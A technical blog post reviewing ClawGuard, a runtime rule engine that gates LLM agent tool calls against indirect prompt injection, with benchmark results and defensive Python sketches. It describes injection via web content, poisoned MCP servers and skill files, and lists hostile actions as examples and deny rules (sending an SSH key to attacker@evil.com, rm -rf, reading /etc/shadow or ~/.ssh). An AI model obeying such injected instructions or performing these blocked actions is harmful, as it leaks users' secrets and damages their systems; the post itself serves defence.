



*A brass valve with one inlet port sealed by a red safety interlock while others remain open: deterministic gating at each tool-call boundary.*

TL;DR. ClawGuard (arXiv 2604.11790, April 2026) drops AgentDojo indirect-injection attack success rate from 0.6–3.1% to 0.0%, and MCPSafeBench from 36.5–46.1% to 7.1–11.2%, by enforcing user-derived constraints at every tool-call boundary rather than filtering prompts. The shift matters: an attacker now has to bypass both the LLM and a deterministic rule engine. If your prompt injection defense lives entirely inside the prompt, you are guarding the wrong layer (see why prompt injection detection is already broken).


Why the prompt layer is the wrong place to defend

You can spend the next quarter tuning Azure Prompt Shield, Meta Prompt Guard, and a regex pipeline on top of both. A 2026 paper showed that six commercial detectors can be evaded at success rates of up to 100% using character-injection and adversarial-ML techniques (arXiv 2504.11168). A systematization-of-knowledge study came to the same conclusion by a different route: no category of guardrail reliably stops prompt injection (arXiv 2506.10597). This is not a tuning problem. It is a layer problem.

The prompt layer is where the attacker wants the fight. Detectors read tokens. LLMs read tokens. Whatever transformation fools the detector but keeps meaning for the LLM wins, and that gap is what attackers optimize against. Runtime enforcement changes the arena: the attacker still has to manipulate tokens to move the LLM, but the damage (a tool call to exfil.attacker.com, a write to /etc/passwd, a shell exec) happens outside the token stream. That is where a deterministic rule engine can stand.

Simon Willison’s framing from 2023 still holds: the only defenses we trust are the ones that do not rely on the LLM getting it right. ClawGuard is the 2026 version of that bet, applied at the tool-call boundary.

What ClawGuard actually enforces

ClawGuard (Wei Zhao, Zhe Li, Peixin Zhang, Jun Sun; arXiv 2604.11790) is a runtime framework that sits between the agent and its tools. Before the agent calls anything external, ClawGuard has already built a rule set for the session, presented it to the user for review, and locked it in. Every subsequent tool call is checked against that rule set.

The rule set has two parts:

  • Baseline rules (ℛ_base). Non-negotiable security invariants: deny shell rm -rf /, deny writes to ~/.ssh, deny network calls to private IP ranges, deny read of /etc/shadow. These load before the user’s task is known.
  • Task rules (ℛ_task). Induced by the LLM from the user’s stated objective before any external tool runs. For “summarize the latest issues in my repo”, the induced rules whitelist the repo’s git domain and working directory and blacklist every other network destination and path. The user sees this rule set and can edit it.
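In code, the two-part rule set amounts to a structure that is sealed before any tool output arrives. A minimal sketch (the names `SessionRules`, `path_denied`, and `host_allowed` are illustrative, not ClawGuard's actual schema):

```python
from dataclasses import dataclass
import fnmatch

@dataclass(frozen=True)  # frozen: the rule set is sealed before any tool output is read
class SessionRules:
    baseline_deny_paths: tuple[str, ...]  # R_base: invariants, loaded before the task is known
    baseline_deny_hosts: tuple[str, ...]
    task_allow_hosts: frozenset[str]      # R_task: induced from the user's stated objective
    task_allow_paths: tuple[str, ...]

def path_denied(rules: SessionRules, path: str) -> bool:
    # Baseline path rules are glob patterns; any match is a hard deny.
    return any(fnmatch.fnmatch(path, pat) for pat in rules.baseline_deny_paths)

def host_allowed(rules: SessionRules, host: str) -> bool:
    # Default-deny: a destination must be task-whitelisted and not baseline-denied.
    return host not in rules.baseline_deny_hosts and host in rules.task_allow_hosts
```

The `frozen=True` is the point: once the user confirms the rules, nothing downstream (including tool output) can mutate them.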

The critical detail is ordering. Rule induction happens before the agent reads any tool output, which means untrusted content cannot contaminate the rules themselves. A malicious web page cannot quietly add attacker.com to the whitelist because by the time the agent sees the page, the whitelist is already sealed.

At each tool-call boundary, four components run:

| Component | What it does | Failure mode without it |
|---|---|---|
| Content Sanitizer | Redacts credentials, API keys, SSH keys from arguments and returns via regex/glob | Secrets leak to tools or to the model's context window |
| Rule Evaluator | Checks tool invocations, file paths, and network destinations against ℛ | Agent calls `send_email(attacker@evil.com, SSH_KEY)` and it just runs |
| Skill Inspector | An LLM judge risk-scores each skill; user confirms before first use | Skill files smuggle behavioral directives with no gate |
| Approval Mechanism | Ambiguous calls route to a human; every event is logged | Silent escalation, no audit trail |
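A minimal Content Sanitizer of the regex kind described above might look like this. The patterns are illustrative only; a production sanitizer needs a far larger set:

```python
import re

# Illustrative secret-shaped patterns; extend heavily for real use.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),  # AWS access key ID format
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]+?-----END [A-Z ]*PRIVATE KEY-----"),
    re.compile(r"(?i)\b(api[_-]?key|token|secret)\b\s*[=:]\s*\S+"),  # key=value style
]

def sanitize(text: str) -> str:
    """Redact anything secret-shaped from tool arguments and tool returns."""
    for pattern in SECRET_PATTERNS:
        text = pattern.sub("[REDACTED]", text)
    return text
```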

The Rule Evaluator returns three verdicts: allow, deny, or ambiguous. Ambiguous routes to the user. This matters because “ambiguous” is where most real systems fail: they either block everything (utility collapses) or allow everything (security collapses). ClawGuard separates the decision.
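The tri-state verdict is the load-bearing design choice, and it is cheap to implement. A sketch, with deny taking precedence over allow (the enum and function names are mine, not the paper's):

```python
from enum import Enum

class Verdict(Enum):
    ALLOW = "allow"
    DENY = "deny"
    AMBIGUOUS = "ambiguous"  # routed to a human, never auto-resolved

def evaluate(destination: str, allowlist: set[str], denylist: set[str]) -> Verdict:
    # Deny wins over allow; anything matching neither list escalates.
    if destination in denylist:
        return Verdict.DENY
    if destination in allowlist:
        return Verdict.ALLOW
    return Verdict.AMBIGUOUS
```

Keeping `AMBIGUOUS` as a first-class outcome is what lets the policy stay strict without collapsing utility: the rule engine never has to guess.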

How the three injection channels actually work

ClawGuard’s threat model names three channels. Each is a live attack surface today.

Channel 1: web and local content injection. The agent reads a web page, a PDF, a search result, or a local file. Adversarial instructions are embedded there. The LLM processes them as if they were user intent. This is the classic indirect prompt injection pattern from the 2023 Greshake paper, now generalized to every tool that returns untrusted text.

Channel 2: MCP server injection. A compromised or malicious Model Context Protocol server does one of two things: embeds instructions in any returned content (same as Channel 1 but harder to audit because MCP servers are remote), or poisons tool description metadata so that the agent’s tool-selection logic is manipulated before a single query runs. Anthropic’s own Git MCP server had three CVEs in January 2026 (CVE-2025-68143/68144/68145) that enabled arbitrary file access and RCE through exactly this pattern.

Channel 3: skill file injection. Skills (the Claude Code and Copilot Extensions model) combine natural-language behavioral directives, tool invocation templates, and capability descriptions in a single config file. A malicious skill is effectively a persistent, structured prompt injection with tool privileges attached. On February 25, 2026, Check Point disclosed a Claude Code issue where a poisoned .claude/settings.json hook achieved RCE the moment a developer opened the repository.

```mermaid
flowchart LR
    U[User objective] --> RI[Rule induction LLM]
    RI --> RR[Raw rules]
    RR --> UC[User review]
    UC --> R[Locked rule set R]

    subgraph Runtime
    A[Agent] --> TC[Tool call]
    TC --> CS[Content Sanitizer]
    CS --> RE[Rule Evaluator]
    RE -->|allow| T[Tool executes]
    RE -->|deny| X[Block + log]
    RE -->|ambiguous| AP[User approval]
    T --> A
    end

    R -.-> RE
    W[Web / local / MCP / skill] -.->|untrusted content| T

    style X fill:#b71c1c,color:#fff
    style R fill:#1b5e20,color:#fff
    style W fill:#7b1fa2,color:#fff
```

All three channels share a property: the hostile signal enters the LLM’s context through a tool, and the damage happens through another tool call. That geometry is why tool-boundary enforcement catches them all with one mechanism.

The numbers that matter

ClawGuard evaluates on three benchmarks across five LLMs. Here is what changes.

| Benchmark | Tasks/model | Baseline ASR | With ClawGuard | Utility retained |
|---|---|---|---|---|
| AgentDojo | 160 | 0.6–3.1% | 0.0% | 98.1–100% completion |
| SkillInject | 84 | 26–48% | 4.8–14% (50–84% relative ASR drop) | — |
| MCPSafeBench | 215 | 36.5–46.1% | 7.1–11.2% | 82.0–86.8% completion |

Two observations. First, AgentDojo baseline numbers look low because most frontier agents have decent passive resistance to AgentDojo’s attacks; ClawGuard closes the remaining gap to zero. For context, PromptArmor reports 0–0.47% on AgentDojo using a guardrail LLM (arXiv 2510.05244), and CaMeL reports 67% attack neutralization with 77% task completion (arXiv 2503.18813). ClawGuard lands the perfect AgentDojo number while keeping completion at 98%+ without the dual-LLM overhead.

Second, the MCPSafeBench numbers are the more important story. MCP-server injection baselines sit in the 36–46% range. That is what unguarded agents look like against compromised tool servers. ClawGuard brings that down by roughly 4x, which is the right order of magnitude for a defense that should not be the only layer. The residual 7–11% is exactly the place to stack a second control.

ClawGuard also tracks an Implicit Resistance Rate: the fraction of defense outcomes that are explicit refusals versus probabilistic model resistance. Without ClawGuard, only 9–16% of survived attacks are explicit refusals. The rest are silent luck. That number is why security teams are nervous about “model-level” defenses: you cannot audit what you cannot observe.

What this means for your architecture

If you are building a tool-augmented agent in 2026, the honest architectural position is that your LLM will be prompt-injected. The question is what that does to the system.

Stop treating detectors as the gate. An input classifier is a signal, not a barrier. It belongs in the telemetry pipeline and the WAF, not in the critical path. Defense in depth for LLM applications gives the layer map.

Make the tool boundary the gate. Every tool call goes through a rule engine that evaluates:

  1. Is the destination (URL, file path, command) in the session whitelist?
  2. Are the arguments free of sanitizable secrets?
  3. Does this call’s side-effect class match the trust level of whatever caused it?

This is independent of what the LLM thinks it is doing. It is the iptables of agents.
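The three checks compose into one gate function that runs before every call. A hedged sketch, assuming a provenance tag on each call (`ToolCall` and its fields are hypothetical, not any framework's API):

```python
import re
from dataclasses import dataclass

# Stand-in secret detector; in practice, reuse the sanitizer's full pattern set.
SECRET_RE = re.compile(r"AKIA[0-9A-Z]{16}")

@dataclass
class ToolCall:
    destination: str  # URL, file path, or command target
    args: str         # serialized arguments
    side_effect: str  # "read" | "write" | "exec" | "network"
    caused_by: str    # "user" | "untrusted" (provenance of the triggering content)

def gate(call: ToolCall, whitelist: set[str]) -> str:
    # 1. Destination must be in the session whitelist.
    if call.destination not in whitelist:
        return "deny"
    # 2. Arguments must be free of secret-shaped strings.
    if SECRET_RE.search(call.args):
        return "deny"
    # 3. Side-effect class must match the trust level of what caused the call:
    #    untrusted content may trigger reads; writes and execs escalate to a human.
    if call.caused_by == "untrusted" and call.side_effect in ("write", "exec"):
        return "ambiguous"
    return "allow"
```

Note that the gate never consults the LLM's stated intent, only the concrete call and its provenance.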

Derive constraints from the user’s task, not from a static policy. A static policy that covers every tool an agent might call is either too loose or too tight. Task-scoped rules, induced once before tool execution, give you the right window of permission for the current session only.

Confirm rules before execution, log every decision. The “user-confirmed rule set” is not ceremony; it is the audit trail. Compliance auditors (see how to evaluate an LLM system you did not build) want a record of what was allowed, denied, and overridden. Runtime enforcement produces that record naturally; prompt-layer detection does not.

Accept that residual risk stays non-zero. ClawGuard’s residual SkillInject rate (4.8–14%) is not a failure; it is the honest floor for context-dependent attacks where damage happens inside generated text rather than through an explicit side-effect. Pair it with output-level checks (markdown rendering sanitization, data-exfiltration monitors), not with more input detectors.

Where runtime enforcement fits in the broader defense stack

ClawGuard is not a standalone answer. It is one layer in a multi-layer stack that is starting to look coherent in 2026.

| Layer | Examples | What it catches |
|---|---|---|
| Input detection | Azure Prompt Shield, Meta Prompt Guard | Obvious injection text (fails on adaptive attacks) |
| Privilege separation | CaMeL (dual LLM + sandboxed interpreter) | Control-flow hijacking via untrusted data |
| Runtime tool enforcement | ClawGuard | Disallowed side-effects at the tool boundary |
| Causal attribution | AttriGuard | Tool calls caused by untrusted content, not user intent |
| Behavioral monitoring | AgentWatcher, trajectory analyzers | Patterns that look like multi-step exfiltration |
| Post-hoc output sanitization | Markdown renderers, URL rewriters | Exfiltration via generated links/images |

The defense stack post covers the neighboring layers. ClawGuard slots into Layer 3, the enforcement boundary between "the LLM decided to do X" and "X actually happens". Miss this layer and the five layers around it end up doing work they were not designed for.

A blunt framing: if your agent reads untrusted content and has tools, and you do not have a deterministic rule engine between the two, your defense stack has a hole the exact shape of the OWASP LLM01 problem. ClawGuard is open source. The cost of the missing layer is higher than the cost of adding it.

What to do on Monday

Three moves that do not require waiting for your vendor.

  1. Inventory your tool surface. Which tools can make outbound network calls? Which can write to disk or run commands? Which read untrusted content (web, email, issue trackers, MCP servers)? Mark any tool that appears in both lists as “high-risk”; those are the calls you need a rule engine around.
  2. Write a baseline rule set. No LLM involved. Hard blocks: no rm -rf, no writes outside the working tree, no private-IP network destinations, no SSH key reads, no .env reads. This is 20 rules you can write in an afternoon and it will prevent more damage than any detector upgrade.
  3. Add a task-scoped derivation step. For each user session, derive the additional URLs, paths, and commands the task actually needs. Present it to the user. Lock it in. Every tool call that falls outside this set, and outside the baseline allowlist, is denied or escalated. If this sounds like work, that is because your current architecture was quietly relying on the LLM to do this work, badly.
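For move 2, the baseline really is an afternoon of work. A starter sketch, where the specific globs and the `/work` write root are assumptions about your layout, not a recommendation to stop at four rules per category:

```python
import fnmatch
import ipaddress
from urllib.parse import urlparse

# Hard blocks, loaded before any task is known. Extend toward ~20 rules for real use.
DENY_COMMAND_GLOBS = ["rm -rf *", "*mkfs*", "* | sh*", "*chmod 777*"]
DENY_PATH_GLOBS = ["*/.ssh/*", "/etc/shadow", "*/.env", "*id_rsa*"]
WRITE_ROOT = "/work"  # assumption: the agent's working tree

def command_blocked(cmd: str) -> bool:
    return any(fnmatch.fnmatch(cmd, g) for g in DENY_COMMAND_GLOBS)

def path_blocked(path: str, writing: bool = False) -> bool:
    if any(fnmatch.fnmatch(path, g) for g in DENY_PATH_GLOBS):
        return True
    # Writes are confined to the working tree; reads fall through to task rules.
    return writing and not path.startswith(WRITE_ROOT + "/")

def url_blocked(url: str) -> bool:
    host = urlparse(url).hostname or ""
    try:
        return ipaddress.ip_address(host).is_private  # no private-IP destinations
    except ValueError:
        return False  # hostnames fall through to the task-scoped allowlist
```

Note the layering: this baseline only hard-denies; everything it passes still has to clear the task-scoped allowlist from move 3.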

None of this requires ClawGuard itself. Clone the ClawGuard repo if you want a reference implementation; build your own if you have opinions about rule DSLs. Either way, move the gate. The prompt layer is not where this fight is won.

Key takeaways

  • Prompt-layer detection is losing to adaptive attacks. Runtime tool-boundary enforcement gives attackers a second lock to pick.
  • ClawGuard gets AgentDojo ASR to 0.0% and MCPSafeBench ASR down roughly 4x, while keeping completion above 82%.
  • The architectural pattern is task-scoped rules, induced before tool use, enforced deterministically at each call, with ambiguous decisions routed to humans.
  • The three channels that actually matter in 2026 (web/local content, MCP servers, skill files) are all caught by the same mechanism because their damage always exits through a tool call.
  • Runtime enforcement is one layer, not the whole stack. Pair it with privilege separation, causal attribution, and output sanitization.

Further reading